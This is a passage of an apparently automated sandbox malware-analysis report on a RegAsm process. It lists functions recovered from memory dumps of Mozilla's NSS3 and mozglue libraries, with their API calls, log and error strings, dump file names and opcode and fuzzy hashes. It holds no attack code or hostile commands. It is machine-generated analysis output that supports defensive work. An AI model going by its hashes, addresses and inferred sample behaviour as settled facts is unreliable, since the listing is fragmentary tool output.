                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E6F53
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E6F69
                                                                                                        • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C1E6F88
                                                                                                        • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C1E6FA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$n,l
                                                                                                        • API String ID: 1003633598-3552411435
                                                                                                        • Opcode ID: aa941e2d785d544514507f375a5eac07b0a8b01bcbf56858a3418ad946171b9b
                                                                                                        • Instruction ID: 9e4e6c59dd1155c0c387d957cc4191d5d922b380e95fe266e308606039583017
                                                                                                        • Opcode Fuzzy Hash: aa941e2d785d544514507f375a5eac07b0a8b01bcbf56858a3418ad946171b9b
                                                                                                        • Instruction Fuzzy Hash: CF31077471115C9FDB00DB24DD59B8A37B9EB47328F454069ED08E7A12DB35E908CBD2
                                                                                                        Function 6C1AAF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_EnterMonitor.NSS3 ref: 6C1AAF47
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790AB
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C2790C9
                                                                                                          • Part of subcall function 6C279090: EnterCriticalSection.KERNEL32 ref: 6C2790E5
                                                                                                          • Part of subcall function 6C279090: TlsGetValue.KERNEL32 ref: 6C279116
                                                                                                          • Part of subcall function 6C279090: LeaveCriticalSection.KERNEL32 ref: 6C27913F
                                                                                                        • FreeLibrary.KERNEL32(?), ref: 6C1AAF6D
                                                                                                        • free.MOZGLUE(?), ref: 6C1AAFA4
                                                                                                        • free.MOZGLUE(?), ref: 6C1AAFAA
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C1AAFB5
                                                                                                        • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C1AAFF5
                                                                                                        • PR_ExitMonitor.NSS3 ref: 6C1AB005
                                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C1AB014
                                                                                                        • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C1AB028
                                                                                                        • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C1AB03C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                        • String ID: %s decr => %d$Unloaded library %s
                                                                                                        • API String ID: 4015679603-2877805755
                                                                                                        • Opcode ID: 7f83af2efc18d8649d9c91e191265055d9c6846e250a163ee47dc9bc742dcf27
                                                                                                        • Instruction ID: c347203ae38d7ec376646c5c5ced792f466fac2f58813f58ba57f89969bf574c
                                                                                                        • Opcode Fuzzy Hash: 7f83af2efc18d8649d9c91e191265055d9c6846e250a163ee47dc9bc742dcf27
                                                                                                        • Instruction Fuzzy Hash: 34313BB9B04110AFD701DFA4DC45A5AB778EB1D748B144265EC0597E00F332E825CBF2
                                                                                                        Function 6C1F6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C1F781D,00000000,6C1EBE2C,?,6C1F6B1D,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C40
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C1F781D,?,6C1EBE2C,?), ref: 6C1F6C58
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C1F781D), ref: 6C1F6C6F
                                                                                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C1F6C84
                                                                                                        • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C1F6C96
                                                                                                          • Part of subcall function 6C1A1240: TlsGetValue.KERNEL32(00000040,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1267
                                                                                                          • Part of subcall function 6C1A1240: EnterCriticalSection.KERNEL32(?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A127C
                                                                                                          • Part of subcall function 6C1A1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A1291
                                                                                                          • Part of subcall function 6C1A1240: PR_Unlock.NSS3(?,?,?,?,6C1A116C,NSPR_LOG_MODULES), ref: 6C1A12A0
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C1F6CAA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                        • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                        • API String ID: 4221828374-3736768024
                                                                                                        • Opcode ID: f73b78fbb2fe0736d07cceb48f97ea9d568de94331fca8f9cc206584bb73e17f
                                                                                                        • Instruction ID: 2f6c960efadf0557d0c58fa61f4a63a15144007071dd634868a87e8b6535dc1b
                                                                                                        • Opcode Fuzzy Hash: f73b78fbb2fe0736d07cceb48f97ea9d568de94331fca8f9cc206584bb73e17f
                                                                                                        • Instruction Fuzzy Hash: 040126F274330D23F60027B92D6AF23759C9F41549F180132FE24E0A81EB92E51A80B6
                                                                                                        Function 6C204E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_SetErrorText.NSS3(00000000,00000000,?,6C1C78F8), ref: 6C204E6D
                                                                                                          • Part of subcall function 6C1A09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C1A06A2,00000000,?), ref: 6C1A09F8
                                                                                                          • Part of subcall function 6C1A09E0: malloc.MOZGLUE(0000001F), ref: 6C1A0A18
                                                                                                          • Part of subcall function 6C1A09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C1A0A33
                                                                                                        • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C1C78F8), ref: 6C204ED9
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703,?,00000000,00000000), ref: 6C1F5942
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703), ref: 6C1F5954
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F596A
                                                                                                          • Part of subcall function 6C1F5920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C1F5984
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C1F5999
                                                                                                          • Part of subcall function 6C1F5920: free.MOZGLUE(00000000), ref: 6C1F59BA
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C1F59D3
                                                                                                          • Part of subcall function 6C1F5920: free.MOZGLUE(00000000), ref: 6C1F59F5
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C1F5A0A
                                                                                                          • Part of subcall function 6C1F5920: free.MOZGLUE(00000000), ref: 6C1F5A2E
                                                                                                          • Part of subcall function 6C1F5920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C1F5A43
                                                                                                        • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204EB3
                                                                                                          • Part of subcall function 6C204820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20484C
                                                                                                          • Part of subcall function 6C204820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C204EB8,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20486D
                                                                                                          • Part of subcall function 6C204820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C204EB8,?), ref: 6C204884
                                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204EC0
                                                                                                          • Part of subcall function 6C204470: TlsGetValue.KERNEL32(00000000,?,6C1C7296,00000000), ref: 6C204487
                                                                                                          • Part of subcall function 6C204470: EnterCriticalSection.KERNEL32(?,?,?,6C1C7296,00000000), ref: 6C2044A0
                                                                                                          • Part of subcall function 6C204470: PR_Unlock.NSS3(?,?,?,?,6C1C7296,00000000), ref: 6C2044BB
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F16
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F2E
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F40
                                                                                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F6C
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F80
                                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C204F8F
                                                                                                        • PK11_UpdateSlotAttribute.NSS3(?,6C2DDCB0,00000000), ref: 6C204FFE
                                                                                                        • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C20501F
                                                                                                        • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C1C78F8), ref: 6C20506B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 560490210-0
                                                                                                        • Opcode ID: da1e0c5afa91e8cbcfc545d78aa521d6610fcfe72ba04286ea39495441594f56
                                                                                                        • Instruction ID: 8937f5fe5eca0ee03c7d0e5821de7bb09fd0e5ebef28d5cdf4d9ef4014faa441
                                                                                                        • Opcode Fuzzy Hash: da1e0c5afa91e8cbcfc545d78aa521d6610fcfe72ba04286ea39495441594f56
                                                                                                        • Instruction Fuzzy Hash: 4051F4B6B0020A9FEB01AF24EC05A9F77B5FF1531DF044536EC0696A11FB32D955CA92
                                                                                                        Function 6C1AACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 786543732-0
                                                                                                        • Opcode ID: f1671ea96de39160b67540e24812239f0bc554b4997349bd75ea5ba7b0a5d74b
                                                                                                        • Instruction ID: ffd8a0adbd8ebf092f16b3de96c6cf5a191f3499e5aeca7952dde4f29d430418
                                                                                                        • Opcode Fuzzy Hash: f1671ea96de39160b67540e24812239f0bc554b4997349bd75ea5ba7b0a5d74b
                                                                                                        • Instruction Fuzzy Hash: 805191B9A012159FDF00DF98D8426AEB778FB1A348F150129DC45A7B00D336A95ACFE2
                                                                                                        Function 6C284C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C284CAF
                                                                                                        • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C284CFD
                                                                                                        • sqlite3_value_text16.NSS3(?), ref: 6C284D44
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                        • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                        • API String ID: 2274617401-4033235608
                                                                                                        • Opcode ID: 42ccda050ce9fb5adb2d2361b242393b34b906e388a5656f64755d520d5f2759
                                                                                                        • Instruction ID: da1e3c2adb403f1f2120f38b1cb60cfafb670acf214515fd4b1d5a1bc5e10621
                                                                                                        • Opcode Fuzzy Hash: 42ccda050ce9fb5adb2d2361b242393b34b906e388a5656f64755d520d5f2759
                                                                                                        • Instruction Fuzzy Hash: 80317BB7E07A1E5BD70446249431BD5B32D778631AF05012BEC245BED4D720AC2D83D2
                                                                                                        Function 6C0DEC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0A4A68), ref: 6C0D945E
                                                                                                          • Part of subcall function 6C0D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0D9470
                                                                                                          • Part of subcall function 6C0D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0D9482
                                                                                                          • Part of subcall function 6C0D9420: __Init_thread_footer.LIBCMT ref: 6C0D949F
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0DEC84
                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0DEC8C
                                                                                                          • Part of subcall function 6C0D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0D94EE
                                                                                                          • Part of subcall function 6C0D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C0D9508
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C0DECA1
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C11F4B8), ref: 6C0DECAE
                                                                                                        • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C0DECC5
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C11F4B8), ref: 6C0DED0A
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C0DED19
                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C0DED28
                                                                                                        • free.MOZGLUE(00000000), ref: 6C0DED2F
                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C11F4B8), ref: 6C0DED59
                                                                                                        Strings
                                                                                                        • [I %d/%d] profiler_ensure_started, xrefs: 6C0DEC94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                        • String ID: [I %d/%d] profiler_ensure_started
                                                                                                        • API String ID: 4057186437-125001283
                                                                                                        • Opcode ID: ac5533a5fc83892d0cf79a367d932d2f99e0557fec856063f8e5a67267ca7cb9
                                                                                                        • Instruction ID: ea3eb04bebc86d296f48abdb09806480a7143d201a0d4e35478fae7a7bf181e6
                                                                                                        • Opcode Fuzzy Hash: ac5533a5fc83892d0cf79a367d932d2f99e0557fec856063f8e5a67267ca7cb9
                                                                                                        • Instruction Fuzzy Hash: 3521D6B56002089FDF009F65D909B9A77F9EB4626CF114210FD2897F41DB39B8069BA1
                                                                                                        Function 6C1E2CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_InitToken), ref: 6C1E2CEC
                                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C1E2D07
                                                                                                          • Part of subcall function 6C2C09D0: PR_Now.NSS3 ref: 6C2C0A22
                                                                                                          • Part of subcall function 6C2C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C2C0A35
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C2C0A66
                                                                                                          • Part of subcall function 6C2C09D0: PR_GetCurrentThread.NSS3 ref: 6C2C0A70
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C2C0A9D
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C2C0AC8
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsmprintf.NSS3(?,?), ref: 6C2C0AE8
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0B19
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0B48
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0C76
                                                                                                          • Part of subcall function 6C2C09D0: PR_LogFlush.NSS3 ref: 6C2C0C7E
                                                                                                        • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C1E2D22
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0B88
                                                                                                          • Part of subcall function 6C2C09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2C0C5D
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C2C0C8D
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0C9C
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0CD1
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C2C0CEC
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0CFB
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0D16
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C2C0D26
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0D35
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C2C0D65
                                                                                                          • Part of subcall function 6C2C09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C2C0D70
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0D90
                                                                                                          • Part of subcall function 6C2C09D0: free.MOZGLUE(00000000), ref: 6C2C0D99
                                                                                                        • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C1E2D3B
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C2C0BAB
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0BBA
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0D7E
                                                                                                        • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C1E2D54
                                                                                                          • Part of subcall function 6C2C09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C2C0BCB
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0BDE
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0C16
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                        • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$n,l
                                                                                                        • API String ID: 420000887-1583813851
                                                                                                        • Opcode ID: 84c166a0fb2300f7c9942bea2af54eea3a12a75d0b51f9d009e3b6761872bb42
                                                                                                        • Instruction ID: fd83314af7c2fa428f1fde1ff7619677f1fdffacd8b045fa340ec139571dee57
                                                                                                        • Opcode Fuzzy Hash: 84c166a0fb2300f7c9942bea2af54eea3a12a75d0b51f9d009e3b6761872bb42
                                                                                                        • Instruction Fuzzy Hash: 7821C175240149EFDB00DF54DD5DB893BB9FB4A329F444124EE04D3A22DB319818CBA2
                                                                                                        Function 6C1B4880 Relevance: 18.2, APIs: 12, Instructions: 193memoryCOMMON
